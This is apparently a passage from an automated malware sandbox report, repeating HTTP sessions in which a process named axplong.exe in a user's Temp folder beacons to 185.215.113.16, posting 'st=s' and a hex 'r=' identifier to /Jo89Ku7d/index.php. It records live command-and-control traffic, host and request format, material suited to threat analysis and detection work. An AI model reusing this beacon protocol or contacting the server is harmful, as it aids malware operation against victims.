                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:42:47.538531065 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:47 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:47.564946890 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:47.804733992 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:47 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                37192.168.2.449829185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:42:47.969048023 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:42:48.715414047 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:48 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:48.721458912 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:48.956645966 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:48 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                38192.168.2.449831185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:42:49.309902906 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:42:49.871306896 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:49 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:49.892885923 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:50.160288095 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:50 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                39192.168.2.449834185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:42:50.296418905 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:42:51.015335083 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:50 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:51.016426086 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:51.241101027 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:51 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                40192.168.2.449835185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:42:51.359771013 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:42:52.086167097 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:51 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:52.120803118 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:52.350513935 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:52 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                41192.168.2.449837185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:42:52.465869904 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:42:53.176367998 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:53 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:53.177192926 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:53.412367105 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:53 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                42192.168.2.449839185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:42:53.533193111 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:42:54.235832930 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:54 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:54.633291006 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:54.861355066 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:54 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                43192.168.2.449841185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:42:54.982584000 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:42:55.687861919 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:55 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:55.688625097 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:55.915740967 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:55 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                44192.168.2.449845185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:42:56.026388884 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:42:56.763569117 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:56 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:56.764302015 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:57.000869989 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:56 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                45192.168.2.449848185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:42:57.375807047 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:42:58.039949894 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:57 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:58.040699005 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:58.272742987 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:58 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
